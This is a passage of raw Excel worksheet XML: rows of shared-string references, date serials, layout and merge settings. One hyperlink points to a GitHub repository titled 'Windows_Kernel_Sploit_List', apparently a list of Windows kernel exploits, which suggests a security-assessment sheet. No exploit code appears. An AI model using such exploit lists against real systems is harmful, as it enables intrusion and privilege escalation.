      <c r="L14185" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14186" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14186" t="s">
        <v>21666</v>
      </c>
      <c r="D14186" t="s">
        <v>20050</v>
      </c>
      <c r="E14186" t="s">
        <v>21667</v>
      </c>
      <c r="F14186" t="s">
        <v>21667</v>
      </c>
      <c r="L14186" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14187" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14187" t="s">
        <v>21668</v>
      </c>
      <c r="C14187" t="s">
        <v>1348</v>
      </c>
      <c r="D14187" t="s">
        <v>21669</v>
      </c>
      <c r="E14187" t="s">
        <v>21670</v>
      </c>
      <c r="F14187" t="s">
        <v>21671</v>
      </c>
      <c r="G14187">
        <v>40841</v>
      </c>
      <c r="L14187" t="s">
        <v>21672</v>
      </c>
    </row>
    <row r="14188" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14188" t="s">
        <v>21673</v>
      </c>
      <c r="C14188" t="s">
        <v>1345</v>
      </c>
      <c r="D14188" t="s">
        <v>21674</v>
      </c>
      <c r="E14188" t="s">
        <v>21675</v>
      </c>
      <c r="F14188" t="s">
        <v>21675</v>
      </c>
      <c r="G14188">
        <v>42727</v>
      </c>
      <c r="L14188" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14189" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14189" t="s">
        <v>21676</v>
      </c>
      <c r="D14189" t="s">
        <v>21677</v>
      </c>
      <c r="E14189" t="s">
        <v>21678</v>
      </c>
      <c r="F14189" t="s">
        <v>21678</v>
      </c>
      <c r="L14189" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14190" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14190" t="s">
        <v>21679</v>
      </c>
      <c r="D14190" t="s">
        <v>21679</v>
      </c>
      <c r="E14190" t="s">
        <v>21680</v>
      </c>
      <c r="F14190" t="s">
        <v>21680</v>
      </c>
      <c r="L14190" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14191" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14191" t="s">
        <v>21681</v>
      </c>
      <c r="D14191" t="s">
        <v>21682</v>
      </c>
      <c r="E14191" t="s">
        <v>2871</v>
      </c>
      <c r="F14191" t="s">
        <v>2871</v>
      </c>
      <c r="L14191" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14192" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14192" t="s">
        <v>21683</v>
      </c>
      <c r="D14192" t="s">
        <v>21684</v>
      </c>
      <c r="E14192" t="s">
        <v>21685</v>
      </c>
      <c r="F14192" t="s">
        <v>21685</v>
      </c>
      <c r="L14192" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14193" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14193" t="s">
        <v>21686</v>
      </c>
      <c r="D14193" t="s">
        <v>21687</v>
      </c>
      <c r="E14193" t="s">
        <v>21021</v>
      </c>
      <c r="F14193" t="s">
        <v>21021</v>
      </c>
      <c r="L14193" t="s">
        <v>21022</v>
      </c>
    </row>
    <row r="14194" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14194" t="s">
        <v>21688</v>
      </c>
      <c r="D14194" t="s">
        <v>21689</v>
      </c>
      <c r="E14194" t="s">
        <v>19602</v>
      </c>
      <c r="F14194" t="s">
        <v>19602</v>
      </c>
      <c r="L14194" t="s">
        <v>21690</v>
      </c>
    </row>
    <row r="14195" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14195" t="s">
        <v>21691</v>
      </c>
      <c r="C14195" t="s">
        <v>1345</v>
      </c>
      <c r="D14195" t="s">
        <v>21692</v>
      </c>
      <c r="E14195" t="s">
        <v>15599</v>
      </c>
      <c r="F14195" t="s">
        <v>15600</v>
      </c>
      <c r="G14195">
        <v>42811</v>
      </c>
      <c r="L14195" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14196" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14196" t="s">
        <v>21693</v>
      </c>
      <c r="C14196" t="s">
        <v>1345</v>
      </c>
      <c r="D14196" t="s">
        <v>21692</v>
      </c>
      <c r="E14196" t="s">
        <v>15599</v>
      </c>
      <c r="F14196" t="s">
        <v>15600</v>
      </c>
      <c r="G14196">
        <v>42811</v>
      </c>
      <c r="L14196" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14197" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14197" t="s">
        <v>21694</v>
      </c>
      <c r="D14197" t="s">
        <v>21695</v>
      </c>
      <c r="E14197" t="s">
        <v>21696</v>
      </c>
      <c r="F14197" t="s">
        <v>21696</v>
      </c>
      <c r="L14197" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14198" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14198" t="s">
        <v>21697</v>
      </c>
      <c r="D14198" t="s">
        <v>21698</v>
      </c>
      <c r="E14198" t="s">
        <v>21233</v>
      </c>
      <c r="F14198" t="s">
        <v>21233</v>
      </c>
      <c r="L14198" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14199" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14199" t="s">
        <v>21699</v>
      </c>
      <c r="D14199" t="s">
        <v>21700</v>
      </c>
      <c r="E14199" t="s">
        <v>21701</v>
      </c>
      <c r="F14199" t="s">
        <v>21701</v>
      </c>
      <c r="L14199" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14200" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14200" t="s">
        <v>21702</v>
      </c>
      <c r="D14200" t="s">
        <v>21703</v>
      </c>
      <c r="E14200" t="s">
        <v>21701</v>
      </c>
      <c r="F14200" t="s">
        <v>21701</v>
      </c>
      <c r="L14200" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14201" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14201" t="s">
        <v>21704</v>
      </c>
      <c r="D14201" t="s">
        <v>21705</v>
      </c>
      <c r="E14201" t="s">
        <v>21706</v>
      </c>
      <c r="F14201" t="s">
        <v>21706</v>
      </c>
      <c r="L14201" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14202" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14202" t="s">
        <v>21707</v>
      </c>
      <c r="D14202" t="s">
        <v>21708</v>
      </c>
      <c r="E14202" t="s">
        <v>21706</v>
      </c>
      <c r="F14202" t="s">
        <v>21706</v>
      </c>
      <c r="L14202" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14203" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14203" t="s">
        <v>21709</v>
      </c>
      <c r="D14203" t="s">
        <v>21710</v>
      </c>
      <c r="E14203" t="s">
        <v>21701</v>
      </c>
      <c r="F14203" t="s">
        <v>21701</v>
      </c>
      <c r="L14203" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14204" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14204" t="s">
        <v>21711</v>
      </c>
      <c r="D14204" t="s">
        <v>21712</v>
      </c>
      <c r="E14204" t="s">
        <v>21713</v>
      </c>
      <c r="F14204" t="s">
        <v>21713</v>
      </c>
      <c r="L14204" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14205" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14205" t="s">
        <v>16751</v>
      </c>
      <c r="C14205" t="s">
        <v>1345</v>
      </c>
      <c r="D14205" t="s">
        <v>21714</v>
      </c>
      <c r="E14205" t="s">
        <v>21715</v>
      </c>
      <c r="F14205" t="s">
        <v>16754</v>
      </c>
      <c r="G14205">
        <v>43690</v>
      </c>
      <c r="L14205" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14206" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14206" t="s">
        <v>21716</v>
      </c>
      <c r="D14206" t="s">
        <v>21717</v>
      </c>
      <c r="E14206" t="s">
        <v>21718</v>
      </c>
      <c r="F14206" t="s">
        <v>21718</v>
      </c>
      <c r="L14206" t="s">
        <v>12742</v>
      </c>
    </row>
    <row r="14207" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14207" t="s">
        <v>21719</v>
      </c>
      <c r="C14207" t="s">
        <v>1348</v>
      </c>
      <c r="D14207" t="s">
        <v>21719</v>
      </c>
      <c r="E14207" t="s">
        <v>21720</v>
      </c>
      <c r="F14207" t="s">
        <v>21720</v>
      </c>
      <c r="L14207" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14208" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14208" t="s">
        <v>21721</v>
      </c>
      <c r="D14208" t="s">
        <v>21722</v>
      </c>
      <c r="E14208" t="s">
        <v>21723</v>
      </c>
      <c r="F14208" t="s">
        <v>21723</v>
      </c>
      <c r="L14208" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14209" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14209" t="s">
        <v>21724</v>
      </c>
      <c r="C14209" t="s">
        <v>1345</v>
      </c>
      <c r="D14209" t="s">
        <v>21725</v>
      </c>
      <c r="E14209" t="s">
        <v>21726</v>
      </c>
      <c r="F14209" t="s">
        <v>21727</v>
      </c>
      <c r="G14209">
        <v>41591</v>
      </c>
      <c r="L14209" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14210" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14210" t="s">
        <v>21728</v>
      </c>
      <c r="D14210" t="s">
        <v>21729</v>
      </c>
      <c r="E14210" t="s">
        <v>21730</v>
      </c>
      <c r="F14210" t="s">
        <v>21730</v>
      </c>
      <c r="L14210" t="s">
        <v>21731</v>
      </c>
    </row>
    <row r="14211" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14211" t="s">
        <v>21732</v>
      </c>
      <c r="C14211" t="s">
        <v>1345</v>
      </c>
      <c r="D14211" t="s">
        <v>21733</v>
      </c>
      <c r="E14211" t="s">
        <v>21734</v>
      </c>
      <c r="F14211" t="s">
        <v>21735</v>
      </c>
      <c r="G14211">
        <v>41292</v>
      </c>
      <c r="L14211" t="s">
        <v>21736</v>
      </c>
    </row>
    <row r="14212" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14212" t="s">
        <v>21737</v>
      </c>
      <c r="D14212" t="s">
        <v>21738</v>
      </c>
      <c r="E14212" t="s">
        <v>21739</v>
      </c>
      <c r="F14212" t="s">
        <v>21739</v>
      </c>
      <c r="G14212" t="s">
        <v>3564</v>
      </c>
      <c r="L14212" t="s">
        <v>21740</v>
      </c>
    </row>
    <row r="14213" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14213" t="s">
        <v>21741</v>
      </c>
      <c r="D14213" t="s">
        <v>21742</v>
      </c>
      <c r="E14213" t="s">
        <v>21131</v>
      </c>
      <c r="F14213" t="s">
        <v>21131</v>
      </c>
      <c r="L14213" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14214" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14214" t="s">
        <v>21743</v>
      </c>
      <c r="D14214" t="s">
        <v>21744</v>
      </c>
      <c r="E14214" t="s">
        <v>21131</v>
      </c>
      <c r="F14214" t="s">
        <v>21131</v>
      </c>
      <c r="L14214" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14215" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14215" t="s">
        <v>21745</v>
      </c>
      <c r="D14215" t="s">
        <v>21746</v>
      </c>
      <c r="E14215" t="s">
        <v>21131</v>
      </c>
      <c r="F14215" t="s">
        <v>21131</v>
      </c>
      <c r="L14215" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14216" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14216" t="s">
        <v>21747</v>
      </c>
      <c r="D14216" t="s">
        <v>21748</v>
      </c>
      <c r="E14216" t="s">
        <v>21749</v>
      </c>
      <c r="F14216" t="s">
        <v>21749</v>
      </c>
      <c r="L14216" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14217" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14217" t="s">
        <v>21750</v>
      </c>
      <c r="D14217" t="s">
        <v>21751</v>
      </c>
      <c r="E14217" t="s">
        <v>21749</v>
      </c>
      <c r="F14217" t="s">
        <v>21749</v>
      </c>
      <c r="L14217" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14218" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14218" t="s">
        <v>21752</v>
      </c>
      <c r="D14218" t="s">
        <v>21753</v>
      </c>
      <c r="E14218" t="s">
        <v>21754</v>
      </c>
      <c r="F14218" t="s">
        <v>21754</v>
      </c>
      <c r="L14218" t="s">
        <v>20906</v>
      </c>
    </row>
    <row r="14219" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14219" t="s">
        <v>21755</v>
      </c>
      <c r="C14219" t="s">
        <v>1348</v>
      </c>
      <c r="D14219" t="s">
        <v>21756</v>
      </c>
      <c r="E14219" t="s">
        <v>21031</v>
      </c>
      <c r="F14219" t="s">
        <v>21031</v>
      </c>
      <c r="L14219" t="s">
        <v>1485</v>
      </c>
    </row>
    <row r="14220" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14220" t="s">
        <v>11476</v>
      </c>
      <c r="C14220" t="s">
        <v>1345</v>
      </c>
      <c r="D14220" t="s">
        <v>21757</v>
      </c>
      <c r="E14220" t="s">
        <v>18768</v>
      </c>
      <c r="F14220" t="s">
        <v>21758</v>
      </c>
      <c r="G14220">
        <v>40819</v>
      </c>
      <c r="L14220" t="s">
        <v>21759</v>
      </c>
    </row>
    <row r="14221" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14221" t="s">
        <v>11476</v>
      </c>
      <c r="C14221" t="s">
        <v>1348</v>
      </c>
      <c r="D14221" t="s">
        <v>21757</v>
      </c>
      <c r="E14221" t="s">
        <v>18768</v>
      </c>
      <c r="F14221" t="s">
        <v>21758</v>
      </c>
      <c r="G14221">
        <v>40819</v>
      </c>
      <c r="L14221" t="s">
        <v>21759</v>
      </c>
    </row>
    <row r="14222" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14222" t="s">
        <v>21760</v>
      </c>
      <c r="C14222" t="s">
        <v>1345</v>
      </c>
      <c r="D14222" t="s">
        <v>21761</v>
      </c>
      <c r="E14222" t="s">
        <v>21762</v>
      </c>
      <c r="F14222" t="s">
        <v>21762</v>
      </c>
      <c r="G14222">
        <v>41023</v>
      </c>
      <c r="L14222" t="s">
        <v>21763</v>
      </c>
    </row>
    <row r="14223" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14223" t="s">
        <v>21760</v>
      </c>
      <c r="C14223" t="s">
        <v>1348</v>
      </c>
      <c r="D14223" t="s">
        <v>21761</v>
      </c>
      <c r="E14223" t="s">
        <v>21762</v>
      </c>
      <c r="F14223" t="s">
        <v>21762</v>
      </c>
      <c r="G14223">
        <v>41023</v>
      </c>
      <c r="L14223" t="s">
        <v>21763</v>
      </c>
    </row>
    <row r="14224" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14224" t="s">
        <v>21764</v>
      </c>
      <c r="C14224" t="s">
        <v>1345</v>
      </c>
      <c r="D14224" t="s">
        <v>21765</v>
      </c>
      <c r="E14224" t="s">
        <v>21766</v>
      </c>
      <c r="F14224" t="s">
        <v>21767</v>
      </c>
      <c r="G14224">
        <v>41422</v>
      </c>
      <c r="L14224" t="s">
        <v>21768</v>
      </c>
    </row>
    <row r="14225" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14225" t="s">
        <v>21764</v>
      </c>
      <c r="C14225" t="s">
        <v>1348</v>
      </c>
      <c r="D14225" t="s">
        <v>21765</v>
      </c>
      <c r="E14225" t="s">
        <v>21766</v>
      </c>
      <c r="F14225" t="s">
        <v>21767</v>
      </c>
      <c r="G14225">
        <v>41422</v>
      </c>
      <c r="L14225" t="s">
        <v>21768</v>
      </c>
    </row>
    <row r="14226" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14226" t="s">
        <v>21769</v>
      </c>
      <c r="C14226" t="s">
        <v>1345</v>
      </c>
      <c r="D14226" t="s">
        <v>21770</v>
      </c>
      <c r="E14226" t="s">
        <v>21766</v>
      </c>
      <c r="F14226" t="s">
        <v>21767</v>
      </c>
      <c r="G14226">
        <v>41422</v>
      </c>
      <c r="L14226" t="s">
        <v>21768</v>
      </c>
    </row>
    <row r="14227" spans="1:12" x14ac:dyDescent="0.25">
      <c r="A14227" t="s">
        <v>21769</v>
      </c>
      <c r="C14227" t="s">
        <v>1348</v>
      </c>
      <c r="D14227" t="s">
        <v>21770</v>
      </c>
      <c r="E14227" t="s">
        <v>21766</v>
      </c>
      <c r="F14227" t="s">
        <v>21767</v>
      </c>
      <c r="G14227">
        <v>41422</v>
      </c>
      <c r="L14227" t="s">
        <v>21768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A1:K40"/>
  <sheetViews>
    <sheetView topLeftCell="A13" zoomScale="70" zoomScaleNormal="70" workbookViewId="0">
      <selection activeCell="B23" sqref="B23"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15.75" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="111" style="31" customWidth="1"/>
    <col min="2" max="2" width="212.85546875" style="31" customWidth="1"/>
    <col min="3" max="3" width="71.5703125" style="31" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A1" s="39" t="s">
        <v>21771</v>
      </c>
      <c r="B1" s="39" t="s">
        <v>21772</v>
      </c>
      <c r="C1" s="39" t="s">
        <v>1237</v>
      </c>
    </row>
    <row r="2" spans="1:3" ht="78.75" x14ac:dyDescent="0.25">
      <c r="A2" s="230" t="s">
        <v>21773</v>
      </c>
      <c r="B2" s="40" t="s">
        <v>21774</v>
      </c>
      <c r="C2" s="69"/>
    </row>
    <row r="3" spans="1:3" ht="63" x14ac:dyDescent="0.25">
      <c r="A3" s="231"/>
      <c r="B3" s="42" t="s">
        <v>21775</v>
      </c>
      <c r="C3" s="70"/>
    </row>
    <row r="4" spans="1:3" ht="48" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A4" s="231"/>
      <c r="B4" s="44" t="s">
        <v>21776</v>
      </c>
      <c r="C4" s="71"/>
    </row>
    <row r="5" spans="1:3" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A5" s="232" t="s">
        <v>21777</v>
      </c>
      <c r="B5" s="48" t="s">
        <v>21778</v>
      </c>
      <c r="C5" s="72"/>
    </row>
    <row r="6" spans="1:3" ht="78.75" x14ac:dyDescent="0.25">
      <c r="A6" s="233"/>
      <c r="B6" s="50" t="s">
        <v>21779</v>
      </c>
      <c r="C6" s="151"/>
    </row>
    <row r="7" spans="1:3" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A7" s="233"/>
      <c r="B7" s="50" t="s">
        <v>21780</v>
      </c>
      <c r="C7" s="73"/>
    </row>
    <row r="8" spans="1:3" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A8" s="233"/>
      <c r="B8" s="50" t="s">
        <v>21781</v>
      </c>
      <c r="C8" s="73"/>
    </row>
    <row r="9" spans="1:3" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A9" s="233"/>
      <c r="B9" s="50" t="s">
        <v>21782</v>
      </c>
      <c r="C9" s="73"/>
    </row>
    <row r="10" spans="1:3" ht="32.25" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A10" s="233"/>
      <c r="B10" s="162" t="s">
        <v>21783</v>
      </c>
      <c r="C10" s="163"/>
    </row>
    <row r="11" spans="1:3" ht="63" x14ac:dyDescent="0.25">
      <c r="A11" s="240" t="s">
        <v>21784</v>
      </c>
      <c r="B11" s="164" t="s">
        <v>21785</v>
      </c>
      <c r="C11" s="165"/>
    </row>
    <row r="12" spans="1:3" ht="142.5" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A12" s="241"/>
      <c r="B12" s="166" t="s">
        <v>21786</v>
      </c>
      <c r="C12" s="167"/>
    </row>
    <row r="13" spans="1:3" ht="126" x14ac:dyDescent="0.25">
      <c r="A13" s="82" t="s">
        <v>21787</v>
      </c>
      <c r="B13" s="83" t="s">
        <v>21788</v>
      </c>
      <c r="C13" s="84"/>
    </row>
    <row r="14" spans="1:3" ht="78.75" x14ac:dyDescent="0.25">
      <c r="A14" s="82"/>
      <c r="B14" s="85" t="s">
        <v>21789</v>
      </c>
      <c r="C14" s="86"/>
    </row>
    <row r="15" spans="1:3" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A15" s="82"/>
      <c r="B15" s="85" t="s">
        <v>21790</v>
      </c>
      <c r="C15" s="86"/>
    </row>
    <row r="16" spans="1:3" ht="63" x14ac:dyDescent="0.25">
      <c r="A16" s="82"/>
      <c r="B16" s="85" t="s">
        <v>21791</v>
      </c>
      <c r="C16" s="86"/>
    </row>
    <row r="17" spans="1:11" ht="63" x14ac:dyDescent="0.25">
      <c r="A17" s="82"/>
      <c r="B17" s="85" t="s">
        <v>21792</v>
      </c>
      <c r="C17" s="86"/>
    </row>
    <row r="18" spans="1:11" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A18" s="82"/>
      <c r="B18" s="85" t="s">
        <v>21793</v>
      </c>
      <c r="C18" s="86"/>
    </row>
    <row r="19" spans="1:11" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A19" s="82"/>
      <c r="B19" s="85" t="s">
        <v>21794</v>
      </c>
      <c r="C19" s="86"/>
    </row>
    <row r="20" spans="1:11" ht="78.75" x14ac:dyDescent="0.25">
      <c r="A20" s="82"/>
      <c r="B20" s="85" t="s">
        <v>21795</v>
      </c>
      <c r="C20" s="86" t="s">
        <v>21796</v>
      </c>
    </row>
    <row r="21" spans="1:11" ht="63.75" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A21" s="82"/>
      <c r="B21" s="147" t="s">
        <v>21797</v>
      </c>
      <c r="C21" s="148" t="s">
        <v>21796</v>
      </c>
    </row>
    <row r="22" spans="1:11" ht="79.5" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A22" s="168" t="s">
        <v>21798</v>
      </c>
      <c r="B22" s="169" t="s">
        <v>21799</v>
      </c>
      <c r="C22" s="170"/>
    </row>
    <row r="23" spans="1:11" ht="173.25" x14ac:dyDescent="0.25">
      <c r="A23" s="242" t="s">
        <v>21800</v>
      </c>
      <c r="B23" s="174" t="s">
        <v>21801</v>
      </c>
      <c r="C23" s="175"/>
      <c r="K23" s="7"/>
    </row>
    <row r="24" spans="1:11" ht="95.25" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A24" s="243"/>
      <c r="B24" s="176" t="s">
        <v>21802</v>
      </c>
      <c r="C24" s="177"/>
      <c r="K24" s="7"/>
    </row>
    <row r="25" spans="1:11" ht="45.75" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A25" s="171" t="s">
        <v>21803</v>
      </c>
      <c r="B25" s="172" t="s">
        <v>21804</v>
      </c>
      <c r="C25" s="173"/>
    </row>
    <row r="26" spans="1:11" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A26" s="232" t="s">
        <v>21805</v>
      </c>
      <c r="B26" s="48" t="s">
        <v>21806</v>
      </c>
      <c r="C26" s="72"/>
    </row>
    <row r="27" spans="1:11" ht="110.25" x14ac:dyDescent="0.25">
      <c r="A27" s="233"/>
      <c r="B27" s="155" t="s">
        <v>21807</v>
      </c>
      <c r="C27" s="73"/>
    </row>
    <row r="28" spans="1:11" ht="173.25" x14ac:dyDescent="0.25">
      <c r="A28" s="233"/>
      <c r="B28" s="155" t="s">
        <v>21808</v>
      </c>
      <c r="C28" s="73"/>
    </row>
    <row r="29" spans="1:11" ht="81.75" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A29" s="233"/>
      <c r="B29" s="50" t="s">
        <v>21809</v>
      </c>
      <c r="C29" s="73"/>
    </row>
    <row r="30" spans="1:11" ht="79.5" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A30" s="239"/>
      <c r="B30" s="52" t="s">
        <v>21810</v>
      </c>
      <c r="C30" s="74"/>
    </row>
    <row r="31" spans="1:11" ht="47.25" x14ac:dyDescent="0.25">
      <c r="A31" s="237" t="s">
        <v>21811</v>
      </c>
      <c r="B31" s="139" t="s">
        <v>21812</v>
      </c>
      <c r="C31" s="140"/>
    </row>
    <row r="32" spans="1:11" ht="189" x14ac:dyDescent="0.25">
      <c r="A32" s="231"/>
      <c r="B32" s="139" t="s">
        <v>21813</v>
      </c>
      <c r="C32" s="154"/>
    </row>
    <row r="33" spans="1:3" ht="281.25" customHeight="1" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A33" s="238"/>
      <c r="B33" s="152" t="s">
        <v>21814</v>
      </c>
      <c r="C33" s="153"/>
    </row>
    <row r="34" spans="1:3" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A34" s="234" t="s">
        <v>21815</v>
      </c>
      <c r="B34" s="34" t="s">
        <v>21816</v>
      </c>
      <c r="C34" s="77"/>
    </row>
    <row r="35" spans="1:3" ht="267.75" x14ac:dyDescent="0.25">
      <c r="A35" s="235"/>
      <c r="B35" s="33" t="s">
        <v>21817</v>
      </c>
      <c r="C35" s="78"/>
    </row>
    <row r="36" spans="1:3" ht="110.25" x14ac:dyDescent="0.25">
      <c r="A36" s="235"/>
      <c r="B36" s="33" t="s">
        <v>21818</v>
      </c>
      <c r="C36" s="78"/>
    </row>
    <row r="37" spans="1:3" ht="78.75" x14ac:dyDescent="0.25">
      <c r="A37" s="235"/>
      <c r="B37" s="68" t="s">
        <v>21819</v>
      </c>
      <c r="C37" s="79"/>
    </row>
    <row r="38" spans="1:3" ht="144.75" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A38" s="235"/>
      <c r="B38" s="68" t="s">
        <v>21820</v>
      </c>
      <c r="C38" s="79" t="s">
        <v>21821</v>
      </c>
    </row>
    <row r="39" spans="1:3" ht="111" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A39" s="235"/>
      <c r="B39" s="68" t="s">
        <v>21822</v>
      </c>
      <c r="C39" s="79"/>
    </row>
    <row r="40" spans="1:3" ht="126.75" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A40" s="236"/>
      <c r="B40" s="37" t="s">
        <v>21823</v>
      </c>
      <c r="C40" s="80"/>
    </row>
  </sheetData>
  <mergeCells count="7">
    <mergeCell ref="A2:A4"/>
    <mergeCell ref="A5:A10"/>
    <mergeCell ref="A34:A40"/>
    <mergeCell ref="A31:A33"/>
    <mergeCell ref="A26:A30"/>
    <mergeCell ref="A11:A12"/>
    <mergeCell ref="A23:A24"/>
  </mergeCells>
  <hyperlinks>
    <hyperlink ref="B25" r:id="rId1" display="https://github.com/njahrckstr/Windows_Kernel_Sploit_List" xr:uid="{00000000-0004-0000-0D00-000000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dimension ref="A1:C16"/>
  <sheetViews>
    <sheetView zoomScale="70" zoomScaleNormal="70" workbookViewId="0">
      <selection activeCell="A4" sqref="A4:A8"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15.75" x14ac:dyDescent="0.25"/>
  <cols>
    <col min="1" max="1" width="111" style="25" customWidth="1"/>
    <col min="2" max="2" width="212.85546875" style="31" customWidth="1"/>
    <col min="3" max="3" width="71.5703125" style="25" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3" ht="16.5" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A1" s="23" t="s">
        <v>21771</v>
      </c>
      <c r="B1" s="39" t="s">
        <v>21772</v>
      </c>
      <c r="C1" s="23" t="s">
        <v>1237</v>
      </c>
    </row>
    <row r="2" spans="1:3" ht="78.75" x14ac:dyDescent="0.25">
      <c r="A2" s="244" t="s">
        <v>21773</v>
      </c>
      <c r="B2" s="40" t="s">
        <v>21824</v>
      </c>
      <c r="C2" s="41"/>
    </row>
    <row r="3" spans="1:3" ht="48" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A3" s="245"/>
      <c r="B3" s="44" t="s">
        <v>21825</v>
      </c>
      <c r="C3" s="43"/>
    </row>
    <row r="4" spans="1:3" ht="31.5" x14ac:dyDescent="0.25">
      <c r="A4" s="246" t="s">
        <v>21777</v>
      </c>
      <c r="B4" s="48" t="s">
        <v>21826</v>
      </c>
      <c r="C4" s="49"/>
    </row>
    <row r="5" spans="1:3" ht="362.25" x14ac:dyDescent="0.25">
      <c r="A5" s="247"/>
      <c r="B5" s="179" t="s">
        <v>21827</v>
      </c>
      <c r="C5" s="180"/>
    </row>
    <row r="6" spans="1:3" ht="141.75" x14ac:dyDescent="0.25">
      <c r="A6" s="247"/>
      <c r="B6" s="179" t="s">
        <v>21828</v>
      </c>
      <c r="C6" s="180"/>
    </row>
    <row r="7" spans="1:3" ht="94.5" x14ac:dyDescent="0.25">
      <c r="A7" s="247"/>
      <c r="B7" s="50" t="s">
        <v>21829</v>
      </c>
      <c r="C7" s="51"/>
    </row>
    <row r="8" spans="1:3" ht="32.25" thickBot="1" x14ac:dyDescent="0.3">
      <c r="A8" s="248"/>
      <c r="B8" s="52" t="s">
        <v>21830</v>
      </c>
      <c r="C8" s="53"/>
    </row>
    <row r="9" spans="1:3" ht="283.5" x14ac:dyDescent="0.25">
      <c r="A9" s="250" t="s">
        <v>21831</v>
      </c>
      <c r="B9" s="87" t="s">
        <v>21832</v>
      </c>
      <c r="C9" s="88"/>
    </row>
    <row r="10" spans="1:3" ht="230.1" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A10" s="250"/>
      <c r="B10" s="178" t="s">
        <v>21833</v>
      </c>
      <c r="C10" s="178"/>
    </row>
